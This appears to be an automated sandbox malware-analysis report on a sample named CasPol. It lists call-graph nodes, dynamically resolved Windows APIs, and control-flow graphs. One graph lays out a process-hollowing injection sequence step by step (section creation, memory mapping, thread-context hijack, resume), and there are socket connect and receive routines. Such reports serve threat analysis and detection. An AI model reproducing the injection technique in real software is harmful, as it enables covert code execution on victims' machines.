GetLastError 53207->53227 53209 10006c6c 53247 10006d7e 53209->53247 53211 10006c74 53256 100069f3 53211->53256 53214 10006c8b 53214->53205 53220 10006ce6 53224 10006d12 53220->53224 53282 1000571e 20 API calls __dosmaperr 53220->53282 53221 10006cc9 53280 10006368 20 API calls _abort 53221->53280 53223 10006cce 53281 1000571e 20 API calls __dosmaperr 53223->53281 53224->53223 53283 100068c9 26 API calls 53224->53283 53228 10005b12 53227->53228 53229 10005b0c 53227->53229 53233 10005b61 SetLastError 53228->53233 53285 1000637b 20 API calls 2 library calls 53228->53285 53284 10005e08 11 API calls 2 library calls 53229->53284 53232 10005b24 53234 10005b2c 53232->53234 53287 10005e5e 11 API calls 2 library calls 53232->53287 53233->53209 53286 1000571e 20 API calls __dosmaperr 53234->53286 53237 10005b41 53237->53234 53238 10005b48 53237->53238 53288 1000593c 20 API calls _abort 53238->53288 53239 10005b32 53241 10005b6d SetLastError 53239->53241 53290 100055a8 38 API calls _abort 53241->53290 53242 10005b53 53289 1000571e 20 API calls __dosmaperr 53242->53289 53246 10005b5a 53246->53233 53246->53241 53248 10006d8a ___DestructExceptionObject 53247->53248 53249 10005af6 _abort 38 API calls 53248->53249 53254 10006d94 53249->53254 53251 10006e18 _abort 53251->53211 53254->53251 53291 100055a8 38 API calls _abort 53254->53291 53292 10005671 RtlEnterCriticalSection 53254->53292 53293 1000571e 20 API calls __dosmaperr 53254->53293 53294 10006e0f RtlLeaveCriticalSection _abort 53254->53294 53295 100054a7 53256->53295 53259 10006a14 GetOEMCP 53261 10006a3d 53259->53261 53260 10006a26 53260->53261 53262 10006a2b GetACP 53260->53262 53261->53214 53263 100056d0 53261->53263 53262->53261 53264 1000570e 53263->53264 53268 100056de _abort 53263->53268 53306 10006368 20 API calls _abort 53264->53306 53265 100056f9 RtlAllocateHeap 53267 1000570c 53265->53267 53265->53268 53267->53223 53270 10006e20 53267->53270 53268->53264 53268->53265 53305 1000474f 7 API calls 2 library calls 
53268->53305 53271 100069f3 40 API calls 53270->53271 53272 10006e3f 53271->53272 53275 10006e90 IsValidCodePage 53272->53275 53277 10006e46 53272->53277 53278 10006eb5 ___scrt_fastfail 53272->53278 53274 10006cc1 53274->53220 53274->53221 53276 10006ea2 GetCPInfo 53275->53276 53275->53277 53276->53277 53276->53278 53317 10002ada 53277->53317 53307 10006acb GetCPInfo 53278->53307 53280->53223 53281->53214 53282->53224 53283->53223 53284->53228 53285->53232 53286->53239 53287->53237 53288->53242 53289->53246 53292->53254 53293->53254 53294->53254 53296 100054c4 53295->53296 53302 100054ba 53295->53302 53297 10005af6 _abort 38 API calls 53296->53297 53296->53302 53298 100054e5 53297->53298 53303 10007a00 38 API calls __fassign 53298->53303 53300 100054fe 53304 10007a2d 38 API calls __fassign 53300->53304 53302->53259 53302->53260 53303->53300 53304->53302 53305->53268 53306->53267 53308 10006baf 53307->53308 53314 10006b05 53307->53314 53311 10002ada _ValidateLocalCookies 5 API calls 53308->53311 53313 10006c5b 53311->53313 53313->53277 53324 100086e4 53314->53324 53316 10008a3e 43 API calls 53316->53308 53318 10002ae3 53317->53318 53319 10002ae5 IsProcessorFeaturePresent 53317->53319 53318->53274 53321 10002b58 53319->53321 53397 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53321->53397 53323 10002c3b 53323->53274 53325 100054a7 __fassign 38 API calls 53324->53325 53326 10008704 MultiByteToWideChar 53325->53326 53328 10008742 53326->53328 53329 100087da 53326->53329 53333 100056d0 21 API calls 53328->53333 53334 10008763 ___scrt_fastfail 53328->53334 53330 10002ada _ValidateLocalCookies 5 API calls 53329->53330 53331 10006b66 53330->53331 53338 10008a3e 53331->53338 53332 100087d4 53343 10008801 20 API calls _free 53332->53343 53333->53334 53334->53332 53336 100087a8 MultiByteToWideChar 53334->53336 53336->53332 53337 100087c4 GetStringTypeW 53336->53337 53337->53332 53339 100054a7 __fassign 38 API calls 
53338->53339 53340 10008a51 53339->53340 53344 10008821 53340->53344 53343->53329 53345 1000883c 53344->53345 53346 10008862 MultiByteToWideChar 53345->53346 53347 10008a16 53346->53347 53348 1000888c 53346->53348 53349 10002ada _ValidateLocalCookies 5 API calls 53347->53349 53351 100056d0 21 API calls 53348->53351 53354 100088ad 53348->53354 53350 10006b87 53349->53350 53350->53316 53351->53354 53352 100088f6 MultiByteToWideChar 53353 10008962 53352->53353 53355 1000890f 53352->53355 53380 10008801 20 API calls _free 53353->53380 53354->53352 53354->53353 53371 10005f19 53355->53371 53359 10008971 53363 100056d0 21 API calls 53359->53363 53364 10008992 53359->53364 53360 10008939 53360->53353 53361 10005f19 11 API calls 53360->53361 53361->53353 53362 10008a07 53379 10008801 20 API calls _free 53362->53379 53363->53364 53364->53362 53365 10005f19 11 API calls 53364->53365 53367 100089e6 53365->53367 53367->53362 53368 100089f5 WideCharToMultiByte 53367->53368 53368->53362 53369 10008a35 53368->53369 53381 10008801 20 API calls _free 53369->53381 53382 10005c45 53371->53382 53374 10005f49 53377 10002ada _ValidateLocalCookies 5 API calls 53374->53377 53376 10005f89 LCMapStringW 53376->53374 53378 10005f9b 53377->53378 53378->53353 53378->53359 53378->53360 53379->53353 53380->53347 53381->53353 53383 10005c75 53382->53383 53384 10005c71 53382->53384 53383->53374 53389 10005fa1 10 API calls 2 library calls 53383->53389 53384->53383 53385 10005c95 53384->53385 53390 10005ce1 53384->53390 53385->53383 53387 10005ca1 GetProcAddress 53385->53387 53388 10005cb1 __crt_fast_encode_pointer 53387->53388 53388->53383 53389->53376 53391 10005d02 LoadLibraryExW 53390->53391 53396 10005cf7 53390->53396 53392 10005d1f GetLastError 53391->53392 53395 10005d37 53391->53395 53393 10005d2a LoadLibraryExW 53392->53393 53392->53395 53393->53395 53394 10005d4e FreeLibrary 53394->53396 53395->53394 53395->53396 53396->53384 53397->53323 53398 434906 53403 434bd8 
SetUnhandledExceptionFilter 53398->53403 53400 43490b pre_c_initialization 53404 4455cc 20 API calls 2 library calls 53400->53404 53402 434916 53403->53400 53404->53402 53405 1000c7a7 53406 1000c7be 53405->53406 53411 1000c82c 53405->53411 53406->53411 53417 1000c7e6 GetModuleHandleA 53406->53417 53407 1000c872 53408 1000c835 GetModuleHandleA 53412 1000c83f 53408->53412 53411->53407 53411->53408 53411->53412 53412->53411 53413 1000c85f GetProcAddress 53412->53413 53413->53411 53418 1000c7ef 53417->53418 53424 1000c82c 53417->53424 53429 1000c803 GetProcAddress 53418->53429 53420 1000c872 53421 1000c835 GetModuleHandleA 53427 1000c83f 53421->53427 53424->53420 53424->53421 53424->53427 53427->53424 53428 1000c85f GetProcAddress 53427->53428 53428->53424 53430 1000c82c 53429->53430 53431 1000c80d VirtualProtect 53429->53431 53433 1000c872 53430->53433 53434 1000c835 GetModuleHandleA 53430->53434 53431->53430 53432 1000c81c VirtualProtect 53431->53432 53432->53430 53436 1000c83f 53434->53436 53435 1000c85f GetProcAddress 53435->53436 53436->53430 53436->53435 53437 41e04e 53438 41e063 ctype ___scrt_fastfail 53437->53438 53439 41e266 53438->53439 53440 432f55 21 API calls 53438->53440 53445 41e21a 53439->53445 53451 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 53439->53451 53444 41e213 ___scrt_fastfail 53440->53444 53442 41e277 53442->53445 53452 432f55 53442->53452 53444->53445 53446 432f55 21 API calls 53444->53446 53449 41e240 ___scrt_fastfail 53446->53449 53447 41e2b0 ___scrt_fastfail 53447->53445 53457 4335db 53447->53457 53449->53445 53450 432f55 21 API calls 53449->53450 53450->53439 53451->53442 53453 432f63 53452->53453 53454 432f5f 53452->53454 53455 43bda0 ___std_exception_copy 21 API calls 53453->53455 53454->53447 53456 432f68 53455->53456 53456->53447 53460 4334fa 53457->53460 53459 4335e3 53459->53445 53461 433513 53460->53461 53465 433509 53460->53465 53462 432f55 21 API calls 53461->53462 53461->53465 53463 
433534 53462->53463 53463->53465 53466 4338c8 CryptAcquireContextA 53463->53466 53465->53459 53467 4338e4 53466->53467 53468 4338e9 CryptGenRandom 53466->53468 53467->53465 53468->53467 53469 4338fe CryptReleaseContext 53468->53469 53469->53467 53470 426c6d 53476 426d42 recv 53470->53476 53477 426a77 53478 426a8c 53477->53478 53490 426b1e 53477->53490 53479 426b83 53478->53479 53480 426bae 53478->53480 53483 426b0e 53478->53483 53487 426b4e 53478->53487 53489 426ad9 53478->53489 53478->53490 53491 426bd5 53478->53491 53505 424f6e 49 API calls ctype 53478->53505 53479->53480 53509 425781 21 API calls 53479->53509 53480->53490 53480->53491 53493 425b72 53480->53493 53483->53487 53483->53490 53507 424f6e 49 API calls ctype 53483->53507 53487->53479 53487->53490 53508 41fbfd 52 API calls 53487->53508 53489->53483 53489->53490 53506 41fbfd 52 API calls 53489->53506 53491->53490 53510 4261e6 28 API calls 53491->53510 53494 425b91 ___scrt_fastfail 53493->53494 53496 425ba0 53494->53496 53500 425bc5 53494->53500 53511 41ec4c 21 API calls 53494->53511 53496->53500 53504 425ba5 53496->53504 53512 420669 46 API calls 53496->53512 53499 425bae 53499->53500 53514 424d96 21 API calls 2 library calls 53499->53514 53500->53491 53502 425c48 53502->53500 53503 432f55 21 API calls 53502->53503 53503->53504 53504->53499 53504->53500 53513 41daf0 49 API calls 53504->53513 53505->53489 53506->53489 53507->53487 53508->53487 53509->53480 53510->53490 53511->53496 53512->53502 53513->53499 53514->53500 53515 4165db 53526 401e65 53515->53526 53517 4165eb 53518 4020f6 28 API calls 53517->53518 53519 4165f6 53518->53519 53520 401e65 22 API calls 53519->53520 53521 416601 53520->53521 53522 4020f6 28 API calls 53521->53522 53523 41660c 53522->53523 53531 412965 53523->53531 53527 401e6d 53526->53527 53530 401e75 53527->53530 53550 402158 22 API calls 53527->53550 53530->53517 53551 40482d 53531->53551 53533 412979 53558 4048c8 connect 53533->53558 53537 41299a 53623 402f10 53537->53623 53540 
404aa1 61 API calls 53541 4129ae 53540->53541 53542 401fd8 11 API calls 53541->53542 53543 4129b6 53542->53543 53628 404c10 53543->53628 53546 401fd8 11 API calls 53547 4129cc 53546->53547 53548 401fd8 11 API calls 53547->53548 53549 4129d4 53548->53549 53552 404846 socket 53551->53552 53553 404839 53551->53553 53554 404860 CreateEventW 53552->53554 53555 404842 53552->53555 53646 40489e WSAStartup 53553->53646 53554->53533 53555->53533 53557 40483e 53557->53552 53557->53555 53559 404a1b 53558->53559 53560 4048ee 53558->53560 53561 40497e 53559->53561 53562 404a21 WSAGetLastError 53559->53562 53560->53561 53563 404923 53560->53563 53647 40531e 53560->53647 53618 402f31 53561->53618 53562->53561 53564 404a31 53562->53564 53682 420cf1 27 API calls 53563->53682 53566 404932 53564->53566 53567 404a36 53564->53567 53572 402093 28 API calls 53566->53572 53687 41cb72 30 API calls 53567->53687 53569 40490f 53652 402093 53569->53652 53571 40492b 53571->53566 53575 404941 53571->53575 53576 404a80 53572->53576 53574 404a40 53688 4052fd 28 API calls 53574->53688 53582 404950 53575->53582 53583 404987 53575->53583 53579 402093 28 API calls 53576->53579 53584 404a8f 53579->53584 53586 402093 28 API calls 53582->53586 53684 421ad1 54 API calls 53583->53684 53587 41b580 80 API calls 53584->53587 53590 40495f 53586->53590 53587->53561 53593 402093 28 API calls 53590->53593 53591 40498f 53594 4049c4 53591->53594 53595 404994 53591->53595 53597 40496e 53593->53597 53686 420e97 28 API calls 53594->53686 53599 402093 28 API calls 53595->53599 53602 41b580 80 API calls 53597->53602 53601 4049a3 53599->53601 53604 402093 28 API calls 53601->53604 53605 404973 53602->53605 53603 4049cc 53606 4049f9 CreateEventW CreateEventW 53603->53606 53608 402093 28 API calls 53603->53608 53607 4049b2 53604->53607 53683 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53605->53683 53606->53561 53609 41b580 80 API calls 53607->53609 53611 4049e2 53608->53611 53612 4049b7 
53609->53612 53613 402093 28 API calls 53611->53613 53685 421143 52 API calls 53612->53685 53615 4049f1 53613->53615 53616 41b580 80 API calls 53615->53616 53617 4049f6 53616->53617 53617->53606 53619 4020df 11 API calls 53618->53619 53620 402f3d 53619->53620 53621 4032a0 28 API calls 53620->53621 53622 402f59 53621->53622 53622->53537 53739 401fb0 53623->53739 53625 402f1e 53626 402055 11 API calls 53625->53626 53627 402f2d 53626->53627 53627->53540 53629 4020df 11 API calls 53628->53629 53630 404c27 53629->53630 53631 4020df 11 API calls 53630->53631 53641 404c30 53631->53641 53632 43bda0 ___std_exception_copy 21 API calls 53632->53641 53634 4020b7 28 API calls 53634->53641 53635 404ca1 53769 404e26 WaitForSingleObject 53635->53769 53639 401fd8 11 API calls 53639->53641 53640 401fd8 11 API calls 53642 404cb1 53640->53642 53641->53632 53641->53634 53641->53635 53641->53639 53742 404b96 53641->53742 53748 401fe2 53641->53748 53757 404cc3 53641->53757 53643 401fd8 11 API calls 53642->53643 53644 404cba 53643->53644 53644->53546 53646->53557 53648 4020df 11 API calls 53647->53648 53649 40532a 53648->53649 53689 4032a0 53649->53689 53651 405346 53651->53569 53653 40209b 53652->53653 53654 4023ce 11 API calls 53653->53654 53655 4020a6 53654->53655 53693 4024ed 53655->53693 53658 41b580 53659 41b631 53658->53659 53660 41b596 GetLocalTime 53658->53660 53661 401fd8 11 API calls 53659->53661 53662 40531e 28 API calls 53660->53662 53663 41b639 53661->53663 53664 41b5d8 53662->53664 53665 401fd8 11 API calls 53663->53665 53697 406383 53664->53697 53667 41b641 53665->53667 53667->53563 53669 402f10 28 API calls 53670 41b5f0 53669->53670 53671 406383 28 API calls 53670->53671 53672 41b5fc 53671->53672 53702 40723b 77 API calls 53672->53702 53674 41b60a 53675 401fd8 11 API calls 53674->53675 53676 41b616 53675->53676 53677 401fd8 11 API calls 53676->53677 53678 41b61f 53677->53678 53679 401fd8 11 API calls 53678->53679 53680 41b628 53679->53680 53681 401fd8 11 API calls 
53680->53681 53681->53659 53682->53571 53683->53561 53684->53591 53685->53605 53686->53603 53687->53574 53690 4032aa 53689->53690 53691 4028e8 28 API calls 53690->53691 53692 4032c9 53690->53692 53691->53692 53692->53651 53694 4024f9 53693->53694 53695 40250a 28 API calls 53694->53695 53696 4020b1 53695->53696 53696->53658 53703 4051ef 53697->53703 53699 406391 53707 402055 53699->53707 53702->53674 53704 4051fb 53703->53704 53713 405274 53704->53713 53706 405208 53706->53699 53708 402061 53707->53708 53709 4023ce 11 API calls 53708->53709 53710 40207b 53709->53710 53735 40267a 53710->53735 53714 405282 53713->53714 53715 405288 53714->53715 53716 40529e 53714->53716 53724 4025f0 53715->53724 53718 4052f5 53716->53718 53719 4052b6 53716->53719 53733 4028a4 22 API calls 53718->53733 53722 4028e8 28 API calls 53719->53722 53723 40529c 53719->53723 53722->53723 53723->53706 53725 402888 22 API calls 53724->53725 53726 402602 53725->53726 53727 402672 53726->53727 53728 402629 53726->53728 53734 4028a4 22 API calls 53727->53734 53730 4028e8 28 API calls 53728->53730 53732 40263b 53728->53732 53730->53732 53732->53723 53736 40268b 53735->53736 53737 4023ce 11 API calls 53736->53737 53738 40208d 53737->53738 53738->53669 53740 4025f0 28 API calls 53739->53740 53741 401fbd 53740->53741 53741->53625 53743 404ba0 WaitForSingleObject 53742->53743 53744 404bcd recv 53742->53744 53782 421107 54 API calls 53743->53782 53746 404be0 53744->53746 53746->53641 53747 404bbc SetEvent 53747->53746 53749 401ff1 53748->53749 53750 402039 53748->53750 53751 4023ce 11 API calls 53749->53751 53750->53641 53752 401ffa 53751->53752 53753 40203c 53752->53753 53754 402015 53752->53754 53755 40267a 11 API calls 53753->53755 53783 403098 28 API calls 53754->53783 53755->53750 53758 4020df 11 API calls 53757->53758 53768 404cde 53758->53768 53759 404e13 53760 401fd8 11 API calls 53759->53760 53761 404e1c 53760->53761 53761->53641 53762 4041a2 28 API calls 53762->53768 53763 401fe2 28 API calls 

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                                                                                                          • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                                                                                                          • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                                                                                                          • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                                          • API String ID: 4236061018-3687161714
                                                                                                                                                                          • Opcode ID: 5fded5d77b72a202610b087cc82529c2f7d7b10a8ab2824fd38dfad8e3bd9f71
                                                                                                                                                                          • Instruction ID: 9b463eec3a0437fb1f175c53e93b0f4db36c95b88d1cb607187732a7b05a7934
                                                                                                                                                                          • Opcode Fuzzy Hash: 5fded5d77b72a202610b087cc82529c2f7d7b10a8ab2824fd38dfad8e3bd9f71
                                                                                                                                                                          • Instruction Fuzzy Hash: E2418BA0E8035879DB207BB65D89E3B3E5CD9857953614837B44C93550EBBCEC408EAE

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          control_flow_graph 448 41812a-418153 449 418157-4181be GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 4181c4-4181cb 449->450 451 4184bb 449->451 450->451 453 4181d1-4181d8 450->453 452 4184bd-4184c7 451->452 453->451 454 4181de-4181e0 453->454 454->451 455 4181e6-418213 call 436f10 * 2 454->455 455->451 460 418219-418224 455->460 460->451 461 41822a-41825a CreateProcessW 460->461 462 418260-418288 VirtualAlloc GetThreadContext 461->462 463 4184b5 GetLastError 461->463 464 41847f-4184b3 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->464 465 41828e-4182ae ReadProcessMemory 462->465 463->451 464->451 465->464 466 4182b4-4182d6 NtCreateSection 465->466 466->464 467 4182dc-4182e9 466->467 468 4182eb-4182f6 NtUnmapViewOfSection 467->468 469 4182fc-41831e NtMapViewOfSection 467->469 468->469 470 418320-41835d VirtualFree NtClose TerminateProcess 469->470 471 418368-41838f GetCurrentProcess NtMapViewOfSection 469->471 470->449 472 418363 470->472 471->464 473 418395-418399 471->473 472->451 474 4183a2-4183c0 call 436990 473->474 475 41839b-41839f 473->475 478 418402-41840b 474->478 479 4183c2-4183d0 474->479 475->474 480 41842b-41842f 478->480 481 41840d-418413 478->481 482 4183d2-4183f5 call 436990 479->482 484 418431-41844e WriteProcessMemory 480->484 485 418454-41846b SetThreadContext 480->485 481->480 483 418415-418428 call 41853e 481->483 491 4183f7-4183fe 482->491 483->480 484->464 489 418450 484->489 485->464 490 41846d-418479 ResumeThread 485->490 489->485 490->464 493 41847b-41847d 490->493 491->478 493->452
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                                                                                                          • ReadProcessMemory.KERNEL32 ref: 004182A6
                                                                                                                                                                          • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                                                                                                                                                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00418328
                                                                                                                                                                          • NtClose.NTDLL(?), ref: 00418332
                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                                                                                                                                                                          • WriteProcessMemory.KERNEL32 ref: 00418446
                                                                                                                                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 00418470
                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                                                                                                          • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                                                                                                                                                                          • NtClose.NTDLL(?), ref: 004184A3
                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004184B5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                                                                                                                                                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                                          • API String ID: 316982871-3035715614
                                                                                                                                                                          • Opcode ID: 8f07b7a254e48d041da81a251375b09bf463a0f5c88c0795319c3241d295ec1a
                                                                                                                                                                          • Instruction ID: 6e605283caf6159cf0966bfa06415cd8be065dbd330dc5e1b11c181c8b11ae87
                                                                                                                                                                          • Opcode Fuzzy Hash: 8f07b7a254e48d041da81a251375b09bf463a0f5c88c0795319c3241d295ec1a
                                                                                                                                                                          • Instruction Fuzzy Hash: 5AA14DB0604301AFDB209F64DD85B6B7BE8FB88745F04482EF689D6291EB78DC44CB59

                                                                                                                                                                          Control-flow Graph

